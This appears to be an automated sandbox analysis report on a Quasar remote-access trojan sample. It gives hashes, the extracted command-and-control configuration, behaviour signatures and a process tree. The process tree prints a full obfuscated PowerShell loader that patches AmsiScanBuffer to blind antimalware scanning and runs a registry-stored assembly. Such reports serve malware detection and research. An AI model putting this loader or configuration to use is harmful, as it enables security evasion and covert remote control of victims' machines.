Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
02-05-2024 20:59
Behavioral task
behavioral1
Sample
R0X-Built.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
R0X-Built.exe
Resource
win10v2004-20240426-en
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
a0f5aa5764c4f66eee82f857f9f447b6
-
SHA1
3c3a780d020cb3eb3088223443fe813abb95dccd
-
SHA256
43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3
-
SHA512
458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384
-
SSDEEP
6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF
Malware Config
Extracted
quasar
3.1.5
Slave
even-lemon.gl.at.ply.gg:33587
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
KaNwItdY6wlv5nCN4prL
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/5024-1-0x0000000000820000-0x000000000088C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4232 created 632 4232 powershell.EXE winlogon.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 2 IoCs
Processes:
$srr-powershell.exeinstall.exepid process 1480 $srr-powershell.exe 4776 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 5 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 4232 set thread context of 4940 4232 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 2740 schtasks.exe 2284 SCHTASKS.exe 3320 schtasks.exe -
Modifies data under HKEY_USERS 55 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1714683702" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={453AF952-5678-4983-A91B-F7D586F23203}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 02 May 2024 21:01:43 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exe$srr-powershell.exewmiprvse.exepid process 4232 powershell.EXE 4232 powershell.EXE 4232 powershell.EXE 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 1480 $srr-powershell.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 2072 wmiprvse.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 1480 $srr-powershell.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 1480 $srr-powershell.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 1480 $srr-powershell.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe 4940 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
R0X-Built.exepowershell.EXE$srr-powershell.exedllhost.exesvchost.exedescription pid process Token: SeDebugPrivilege 5024 R0X-Built.exe Token: SeDebugPrivilege 4232 powershell.EXE Token: SeDebugPrivilege 1480 $srr-powershell.exe Token: SeDebugPrivilege 4232 powershell.EXE Token: SeDebugPrivilege 4940 dllhost.exe Token: SeAssignPrimaryTokenPrivilege 2480 svchost.exe Token: SeIncreaseQuotaPrivilege 2480 svchost.exe Token: SeSecurityPrivilege 2480 svchost.exe Token: SeTakeOwnershipPrivilege 2480 svchost.exe Token: SeLoadDriverPrivilege 2480 svchost.exe Token: SeSystemtimePrivilege 2480 svchost.exe Token: SeBackupPrivilege 2480 svchost.exe Token: SeRestorePrivilege 2480 svchost.exe Token: SeShutdownPrivilege 2480 svchost.exe Token: SeSystemEnvironmentPrivilege 2480 svchost.exe Token: SeUndockPrivilege 2480 svchost.exe Token: SeManageVolumePrivilege 2480 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2480 svchost.exe Token: SeIncreaseQuotaPrivilege 2480 svchost.exe Token: SeSecurityPrivilege 2480 svchost.exe Token: SeTakeOwnershipPrivilege 2480 svchost.exe Token: SeLoadDriverPrivilege 2480 svchost.exe Token: SeSystemtimePrivilege 2480 svchost.exe Token: SeBackupPrivilege 2480 svchost.exe Token: SeRestorePrivilege 2480 svchost.exe Token: SeShutdownPrivilege 2480 svchost.exe Token: SeSystemEnvironmentPrivilege 2480 svchost.exe Token: SeUndockPrivilege 2480 svchost.exe Token: SeManageVolumePrivilege 2480 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2480 svchost.exe Token: SeIncreaseQuotaPrivilege 2480 svchost.exe Token: SeSecurityPrivilege 2480 svchost.exe Token: SeTakeOwnershipPrivilege 2480 svchost.exe Token: SeLoadDriverPrivilege 2480 svchost.exe Token: SeSystemtimePrivilege 2480 svchost.exe Token: SeBackupPrivilege 2480 svchost.exe Token: SeRestorePrivilege 2480 svchost.exe Token: SeShutdownPrivilege 2480 svchost.exe Token: SeSystemEnvironmentPrivilege 2480 svchost.exe Token: SeUndockPrivilege 2480 svchost.exe Token: SeManageVolumePrivilege 2480 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2480 svchost.exe Token: SeIncreaseQuotaPrivilege 2480 svchost.exe Token: SeSecurityPrivilege 2480 svchost.exe Token: SeTakeOwnershipPrivilege 2480 svchost.exe Token: SeLoadDriverPrivilege 2480 svchost.exe Token: SeSystemtimePrivilege 2480 svchost.exe Token: SeBackupPrivilege 2480 svchost.exe Token: SeRestorePrivilege 2480 svchost.exe Token: SeShutdownPrivilege 2480 svchost.exe Token: SeSystemEnvironmentPrivilege 2480 svchost.exe Token: SeUndockPrivilege 2480 svchost.exe Token: SeManageVolumePrivilege 2480 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2480 svchost.exe Token: SeIncreaseQuotaPrivilege 2480 svchost.exe Token: SeSecurityPrivilege 2480 svchost.exe Token: SeTakeOwnershipPrivilege 2480 svchost.exe Token: SeLoadDriverPrivilege 2480 svchost.exe Token: SeSystemtimePrivilege 2480 svchost.exe Token: SeBackupPrivilege 2480 svchost.exe Token: SeRestorePrivilege 2480 svchost.exe Token: SeShutdownPrivilege 2480 svchost.exe Token: SeSystemEnvironmentPrivilege 2480 svchost.exe Token: SeUndockPrivilege 2480 svchost.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
RuntimeBroker.exepid process 3920 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 5024 wrote to memory of 2740 5024 R0X-Built.exe schtasks.exe PID 5024 wrote to memory of 2740 5024 R0X-Built.exe schtasks.exe PID 5024 wrote to memory of 2740 5024 R0X-Built.exe schtasks.exe PID 5024 wrote to memory of 1480 5024 R0X-Built.exe $srr-powershell.exe PID 5024 wrote to memory of 1480 5024 R0X-Built.exe $srr-powershell.exe PID 5024 wrote to memory of 1480 5024 R0X-Built.exe $srr-powershell.exe PID 5024 wrote to memory of 4776 5024 R0X-Built.exe install.exe PID 5024 wrote to memory of 4776 5024 R0X-Built.exe install.exe PID 5024 wrote to memory of 4776 5024 R0X-Built.exe install.exe PID 5024 wrote to memory of 2284 5024 R0X-Built.exe SCHTASKS.exe PID 5024 wrote to memory of 2284 5024 R0X-Built.exe SCHTASKS.exe PID 5024 wrote to memory of 2284 5024 R0X-Built.exe SCHTASKS.exe PID 1480 wrote to memory of 3320 1480 $srr-powershell.exe schtasks.exe PID 1480 wrote to memory of 3320 1480 $srr-powershell.exe schtasks.exe PID 1480 wrote to memory of 3320 1480 $srr-powershell.exe schtasks.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4232 wrote to memory of 4940 4232 powershell.EXE dllhost.exe PID 4940 wrote to memory of 632 4940 dllhost.exe winlogon.exe PID 4940 wrote to memory of 688 4940 dllhost.exe lsass.exe PID 4940 wrote to memory of 996 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 460 4940 dllhost.exe dwm.exe PID 4940 wrote to memory of 720 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1036 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1044 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1100 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1160 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1180 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1212 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1324 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1344 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1392 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1400 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1424 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1580 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1616 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1676 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1732 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1792 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1868 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1972 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1968 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1832 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 1932 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2132 4940 dllhost.exe spoolsv.exe PID 4940 wrote to memory of 2224 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2320 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2340 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2356 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2428 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2436 4940 dllhost.exe sysmon.exe PID 4940 wrote to memory of 2464 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2480 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2492 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2760 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 2024 4940 dllhost.exe unsecapp.exe PID 4940 wrote to memory of 712 4940 dllhost.exe sihost.exe PID 4940 wrote to memory of 2752 4940 dllhost.exe svchost.exe PID 4940 wrote to memory of 3312 4940 dllhost.exe Explorer.EXE -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:632
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:460
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f816fa4c-2d80-405d-9c7a-d63c2210d796}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4940
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:688
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:996
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:720
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:1036
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1100
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1160
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1180
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FfeAyZmxiMuX{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RPfCydHltNFkib,[Parameter(Position=1)][Type]$BaUwOXrJjl)$mcPGFrVMJTm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'f'+'l'+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+'dD'+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+'De'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+'A'+'n'+''+[Char](115)+''+[Char](105)+''+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s'+','+'A'+[Char](117)+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$mcPGFrVMJTm.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+''+'a'+''+'l'+''+[Char](78)+'am'+'e'+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+','+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$RPfCydHltNFkib).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+'ime,'+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$mcPGFrVMJTm.DefineMethod(''+[Char](73)+'nv'+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'H'+[Char](105)+'d'+[Char](101)+''+'B'+'y'+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t'+','+'V'+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+'',$BaUwOXrJjl,$RPfCydHltNFkib).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+[Char](105)+''+'m'+'e,'+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');Write-Output $mcPGFrVMJTm.CreateType();}$gyvtCtEnMElSJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'em'+[Char](46)+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+'i'+''+'c'+'r'+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+'N'+'a'+[Char](116)+''+'i'+'v'+[Char](101)+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'o'+'d'+''+'s'+'');$maCXFrrWWCipHQ=$gyvtCtEnMElSJ.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+[Char](114)+'oc'+[Char](65)+'d'+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$cbugsVvgOoeqkrxBoSj=FfeAyZmxiMuX @([String])([IntPtr]);$KKkDpsGDetWjhEsEgGrhmk=FfeAyZmxiMuX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$KIkmedumeyX=$gyvtCtEnMElSJ.GetMethod('G'+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+'r'+''+[Char](110)+''+'e'+'l'+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$zhIluKzFnspIzT=$maCXFrrWWCipHQ.Invoke($Null,@([Object]$KIkmedumeyX,[Object](''+'L'+''+[Char](111)+''+[Char](97)+''+'d'+'Li'+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+''+[Char](121)+'A')));$NWjSiDPuPQzntJJcF=$maCXFrrWWCipHQ.Invoke($Null,@([Object]$KIkmedumeyX,[Object]('V'+'i'+''+'r'+'t'+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+'t'+[Char](101)+'c'+[Char](116)+'')));$KRLkQko=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zhIluKzFnspIzT,$cbugsVvgOoeqkrxBoSj).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'');$IUmvlpZiHUlvgCHps=$maCXFrrWWCipHQ.Invoke($Null,@([Object]$KRLkQko,[Object](''+'A'+''+[Char](109)+''+[Char](115)+'i'+'S'+'can'+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+''+'r'+'')));$ToepwfnrCu=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NWjSiDPuPQzntJJcF,$KKkDpsGDetWjhEsEgGrhmk).Invoke($IUmvlpZiHUlvgCHps,[uint32]8,4,[ref]$ToepwfnrCu);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$IUmvlpZiHUlvgCHps,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NWjSiDPuPQzntJJcF,$KKkDpsGDetWjhEsEgGrhmk).Invoke($IUmvlpZiHUlvgCHps,[uint32]8,0x20,[ref]$ToepwfnrCu);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+[Char](87)+''+'A'+''+[Char](82)+'E').GetValue(''+[Char](36)+'77'+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4232
